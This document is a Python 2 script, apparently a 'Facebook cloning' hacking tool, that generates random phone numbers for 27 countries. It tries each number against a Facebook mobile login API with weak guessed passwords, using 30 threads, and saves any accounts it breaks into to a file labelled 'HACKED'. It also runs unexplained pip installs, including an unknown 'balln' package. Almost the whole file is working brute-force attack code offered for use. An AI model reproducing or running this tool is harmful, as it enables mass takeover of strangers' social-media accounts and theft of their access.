#CYBER NAME BLACK-KILLER
#GITHUB: https://github.com/ShuBhamg0sain
#WHATAPP NO +919557777030
import os
CorrectUsername = "g0sain"
CorrectPassword = "sim2"

loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;96m[#] \x1b[0;36m Enter Username\x1b[1;92m➤ ")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;96m[#] \x1b[0;36m Enter Password\x1b[1;92m➤ ")
        if (password == CorrectPassword):
            print "Logged in successfully as " + username #fb-cloning-id SG
            loop = 'false'
        else:
            print "Wrong password!"
            os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
    else:
        print "Wrong username!"
        os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(1000000):

    nmbr = random.randint(1111111, 9999999)

    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()

try:
    import requests
except ImportError:
    os.system('pip2 install requests')

try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
    time.sleep(1)
    os.system('python2 nmbr.py')

from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
        print '[!] Exit'
        os.sys.exit()

def psb(z):
        for e in z + '\n':
                sys.stdout.write(e)
                sys.stdout.flush()
                time.sleep(0.03)

def t():
    time.sleep(1)
def cb():
    os.system('clear')
##### Dev : ShuBhamg0sain#####
##### LOGO #####
logo='''
\033[1;96m•◈•─•◈•\033[1;92mShuBhamg0sain\033[1;96m•◈•─•◈•
\033[1;92m      $    $     $     $    $
\033[1;92m     $    $$     $     $$    $
\033[1;92m    $$   $$      $      $$    $$
\033[1;92m    $$   $$      $      $$    $
\033[1;92m   $$    $$      $      $$    $$
\033[1;92m   $$    $$    $$$$$    $$    $$
\033[1;92m   $$   $$$   $$$$$$$   $$$   $$
\033[1;92m  $$$   $$$   $$$$$$$   $$$   $$$
\033[1;92m  $$$   $$$   $$$$$$$   $$$   $$$
\033[1;92m  $$$   $$$    $$$$$    $$$   $$$
\033[1;92m  $$$    $$$   $$$$$   $$$   $$$$
\033[1;91m   $$$$$$$-BLACK-KILLER-$$$$$$$$
\033[1;92m           $$$$$$$$$$$$$$
\033[1;92m            $$$$$$$$$$$$
\033[1;91m   $$$$$$$-ShuBhamg0sain-$$$$$$$$
\033[1;92m  $$$$$$$$$$_$$$$$ $$$$$-$$$$$$$$$$
\033[1;92m $$$$   $$$  $$$$   $$$$  $$$   $$$$
\033[1;92m $$$    $$$  $$$$$ $$$$$  $$$    $$$
\033[1;92m  $$$   $$$  $$$     $$$  $$$   $$$
\033[1;92m  $$$   $$$  $$$$$ $$$$$  $$$   $$$
\033[1;92m   $$    $$   $$$   $$$   $$    $$
\033[1;92m   $$$   $$   $$$$ $$$$   $$   $$$
\033[1;92m    $$    $$   $$$$$$$   $$    $$
\033[1;92m     $$    $    $$$$$    $    $$
\033[1;92m      $     $           $     $
\033[1;92m       $     $         $    $
\x1b[1;93m--------------------------------------------------------------
\x1b[1;92m➣  NAME        : Shubhamg0sain
\x1b[1;91m➣  CYBER NAME  : BLACK-KILLER
\x1b[1;93m➣  WHATSAPP NO : +919557777030
\x1b[1;95m➣  WARNING     : DON,T CALL ME ONLY TEXT
\x1b[1;97m➣  NOTE        : USE FAST 4G SIM NET
\x1b[1;93m--------------------------------------------------------------
                                '''

back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
        os.system('clear')
        print logo
        print "\033[1;96m⊱⋕⊰══════════════════════════════════════════════⊱⋕⊰\n"
      	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[1]  Bangladesh\033[1;91m☆.\x1b[1;96m[14]  Australia'
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[2]  U.S.A     \033[1;91m☆.\x1b[1;96m[15]  Canada'
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[3]  U.K       \033[1;91m☆.\x1b[1;96m[16]  China'
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;91m[4]  India     \033[1;91m☆.\x1b[1;96m[17]  Denmark'        
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[5]  Brazil    \033[1;91m☆.\x1b[1;96m[18]  France'        
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[6]  Japan     \033[1;91m☆.\x1b[1;96m[19]  Germany'        
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[7]  Korea     \033[1;91m☆.\x1b[1;96m[20]  Malaysia'        
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[8]  Italy     \033[1;91m☆.\x1b[1;96m[21]  Srilanka'        
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[9]  Spain     \033[1;91m☆.\x1b[1;96m[22]  Turkey'       
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[10] Poland    \033[1;91m☆.\x1b[1;96m[23]  U.A.E'       
        print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;91m[11] Pakistan  \033[1;91m☆.\x1b[1;96m[24]  SaudiArabia'
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[12] Indonesia \033[1;91m☆.\x1b[1;96m[25]  Israel'     
        print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[13] Greece    \033[1;91m☆.\x1b[1;96m[26]  Iran'       
	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[27] Nigeria   \033[1;91m☆.\x1b[1;91m[28]  follow me'       	
 	print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[29] exit      \033[1;91m☆.\x1b[1;91m[30]  updatetool'
        print "\033[1;96m⊱⋕⊰══════════════════════════════════════════════⊱⋕⊰\n"
        print 50*'-'
	action()        

def action():
        bch = raw_input('\n  ENTER HERE ANY NUMBER ')
        if bch =='':
                print '[!] Fill in correctly'
                action()
        elif bch =="1":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
                print "\033[1;93m175,165,191, 192, 193, 194, 195, 196, 197, 198, 199"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+880"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="2":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m555,786, 815, 315, 256, 401, 718, 917, 202, 701, 303, 703, 803, 999, 708"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+1"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="3":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m715,785,765,725,745,735,737, 706, 748, 783, 739, 759, 790"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+44"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="4":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
                print "\033[1;93m905,975,755,855,954, 897, 967, 937, 700, 727, 965, 786, 874, 856, 566, 590, 527, 568, 578"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+91"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="5":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m127, 179, 117, 853, 318, 219, 834, 186, 479, 113"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+55"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="6":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m11, 12, 19, 16, 15, 13, 14, 18, 17"

                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+81"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="7":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m1, 2, 3, 4, 5, 6, 7, 8, 9"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+82"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="8":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m311,323,385,388, 390, 391, 371, 380, 368, 386, 384, 332, 344, 351, 328"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+39"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="9":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m655,755,60, 76, 73, 64, 69, 77, 65, 61, 75, 68"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+34"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="10":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m66, 69, 78, 79, 60, 72, 67, 53, 51"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+48"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="11":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m01, ~to~~, 49"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+03"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="12":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m81,83,85,84,89,"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+880"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="13":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
                print "\033[1;93m693,698,694,695"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+3069"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="14":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m455"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+61"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="15":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m555,"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+1"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="16":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m1355,1555,1855,"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+86"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="17":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m2,3,4,5,6,7,8"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+45"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="18":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m65,70,73,74,76,77"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+33"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="19":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m151,152,153,155,157,159,160,162,179,163,174,163"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+49"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="20":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m11,12,13,14,15,16,17,18,19"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+60"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="21":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m71,72,73,74,75,76,77,78"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+94"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="22":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m55,54,53,52,50"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+90"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="23":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
                print "\033[1;95m50,55,58,54,56"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+971"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="24":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m50,51,52,53,54,55,56,57,58,"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+966"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="25":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m52,55"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+972"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="26":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
		print "\033[1;93m990,915,901,933,938,902"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+98"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="27":
                os.system("clear")
                print (logo)
                print "\033[1;91mENTER THE CODE HERE"
                print "\033[1;95m82, 83, 84, 85, 86, 87, 88, 89"
                print "\033[1;94m31, 33, 34, 35, 36, 37, 38, 39"
                print "\033[1;94m41, 42, 43, 44, 45, 46, 47, 48"
                try:
                        c = raw_input(" SELECTED CODE: ")
                        k="+234"
                        idlist = ('.txt')
                        for line in open(idlist,"r").readlines():
                                id.append(line.strip())
                except IOError:
                        print ("[!] File Not Found")
                        raw_input("\n[ Back ]")
                        menu()
        elif bch =="28":
                os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
                print "\033[1;91mrun worldsallsimv2 by python2 S.py"
               
        elif bch =="30":
            os.system("clear")
            os.system("pip2 install --upgrade balln")
            os.system("pip2 install --upgrade balln")
            os.system("clear")
            print(logo)
            print
            psb (" Tool has been successfully updated")
            time.sleep(2)
            os.system("python2 S.py")
#       elif chb =='3':
#           os.system('xdg-open https://www.facebook.com/100002059014174/posts/2677733205638620/?substory_index=0&app=fbl')
#           time.sleep(1)
#           menu()
        elif bch =='29':
                exb()
        else:
                print '[!] Fill in correctly'
                action()

        xxx = str(len(id))
        psb ('[✓] Total Numbers: '+xxx)
        time.sleep(0.5)
        psb ('[✓] Please wait, process is running ...')
        time.sleep(0.5)
        psb ('[!] (for Exit) Press CTRL Then Press z')
        time.sleep(0.5)
        print 50*'-'
        print


        def main(arg):
                global cpb,oks
                user = arg
                try:
                        os.mkdir('save')
                except OSError:
                        pass
                try:
                        pass1 = user
                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                        q = json.load(data)
                        if 'access_token' in q:
                                print '\x1b[1;91mBLACK-KILLER-HACKED\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
                                okb = open('save/successfull.txt', 'a')
                                okb.write(k+c+user+'|'+pass1+'\n')
                                okb.close()
                                oks.append(c+user+pass1)
                        else:
                                if 'www.facebook.com' in q['error_msg']:
                                        print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
                                        cps = open('save/checkpoint.txt', 'a')
                                        cps.write(k+c+user+'|'+pass1+'\n')
                                        cps.close()
                                        cpb.append(c+user+pass1)
                                else:
                                        pass2 = '786786'
                                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                        q = json.load(data)
                                        if 'access_token' in q:
                                                print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2       
                                                okb = open('save/successfull.txt', 'a')
                                                okb.write(k+c+user+'|'+pass2+'\n')
                                                okb.close()
                                                oks.append(c+user+pass2)
                                        else:
                                                if 'www.facebook.com' in q['error_msg']:
                                                        print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
                                                        cps = open('save/checkpoint.txt', 'a')
                                                        cps.write(k+c+user+'|'+pass2+'\n')
                                                        cps.close()
                                                        cpb.append(c+user+pass2)
                                                else:
                                                        pass3 = k + c + user
                                                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                                        q = json.load(data)
                                                        if 'access_token' in q:
                                                                print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
                                                                okb = open('save/successfull.txt', 'a')
                                                                okb.write(k+c+user+'|'+pass3+'\n')
                                                                okb.close()
                                                                oks.append(c+user+pass3)
                                                        else:
                                                                if 'www.facebook.com' in q['error_msg']:
                                                                        print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
                                                                        cps = open('save/checkpoint.txt', 'a')
                                                                        cps.write(k+c+user+'|'+pass3+'\n')
                                                                        cps.close()
                                                                        cpb.append(c+user+pass3)
                                                                else:
                                                                        pass4 = k + c
                                                                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                                                        q = json.load(data)
                                                                        if 'access_token' in q:
                                                                                print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
                                                                                okb = open('save/successfull.txt', 'a')
                                                                                okb.write(k+c+user+'|'+pass4+'\n')
                                                                                okb.close()
                                                                                oks.append(c+user+pass4)
                                                                        else:
                                                                                if 'www.facebook.com' in q['error_msg']:
                                                                                        print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
                                                                                        cps = open('save/checkpoint.txt', 'a')
                                                                                        cps.write(k+c+user+'|'+pass4+'\n')
                                                                                        cps.close()
                                                                                        cpb.append(c+user+pass4)
                                                                                else:
                                                                                        pass5 = c
                                                                                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                                                                        q = json.load(data)
                                                                                        if 'access_token' in q:
                                                                                                print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass5
                                                                                                okb = open('save/successfull.txt', 'a')
                                                                                                okb.write(k+c+user+'|'+pass5+'\n')
                                                                                                okb.close()
                                                                                                oks.append(c+user+pass5)
                                                                                        else:
                                                                                                if 'www.facebook.com' in q['error_msg']:
                                                                                                        print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass5
                                                                                                        cps = open('save/checkpoint.txt', 'a')
                                                                                                        cps.write(k+c+user+'|'+pass5+'\n')
                                                                                                        cps.close()
                                                                                                        cpb.append(c+user+pass5)
                                                                                                else:
                                                                                                        pass6 = 'Pakistan'
                                                                                                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                                                                                        q = json.load(data)
                                                                                                        if 'access_token' in q:
                                                                                                                print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass6
                                                                                                                okb = open('save/successfull.txt', 'a')
                                                                                                                okb.write(k+c+user+'|'+pass6+'\n')
                                                                                                                okb.close()
                                                                                                                oks.append(c+user+pass6)
                                                                                                        else:
                                                                                                                if 'www.facebook.com' in q['error_msg']:
                                                                                                                        print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass6
                                                                                                                        cps = open('save/checkpoint.txt', 'a')
                                                                                                                        cps.write(k+c+user+'|'+pass6+'\n')
                                                                                                                        cps.close()
                                                                                                                        cpb.append(c+user+pass6)
                                                                                                                else:
                                                                                                                        pass7 = 'india123'
                                                                                                                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass7 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                                                                                                        q = json.load(data)
                                                                                                                        if 'access_token' in q:
                                                                                                                                print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass7
                                                                                                                                okb = open('save/successfull.txt', 'a')
                                                                                                                                okb.write(k+c+user+'|'+pass7+'\n')
                                                                                                                                okb.close()
                                                                                                                                oks.append(c+user+pass7)
                                                                                                                        else:
                                                                                                                                if 'www.facebook.com' in q['error_msg']:
                                                                                                                                        print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass7
                                                                                                                                        cps = open('save/checkpoint.txt', 'a')
                                                                                                                                        cps.write(k+c+user+'|'+pass7+'\n')
                                                                                                                                        cps.close()
                                                                                                                                        cpb.append(c+user+pass7)
                                                                                                                                else:
                                                                                                                                        pass8 = '786786786'
                                                                                                                                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                                                                                                                        q = json.load(data)
                                                                                                                                        if 'access_token' in q:
                                                                                                                                                print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass8
                                                                                                                                                okb = open('save/successfull.txt', 'a')
                                                                                                                                                okb.write(k+c+user+'|'+pass8+'\n')
                                                                                                                                                okb.close()
                                                                                                                                                oks.append(c+user+pass8)
                                                                                                                                        else:
                                                                                                                                                if 'www.facebook.com' in q['error_msg']:
                                                                                                                                                        print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass8
                                                                                                                                                        cps = open('save/checkpoint.txt', 'a')
                                                                                                                                                        cps.write(k+c+user+'|'+pass8+'\n')
                                                                                                                                                        cps.close()
                                                                                                                                                        cpb.append(c+user+pass8)


                except:
                        pass

        p = ThreadPool(30)
        p.map(main, id)
        print 50*'-'
        print '[✓] Process Has Been Completed ....'
        print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
        print('[✓] CP File Has Been Saved : save/checkpoint.txt')
        raw_input('\n[Press Enter To Go Back]')
        os.system('python2 S.py')

if __name__ == '__main__':
        menu()
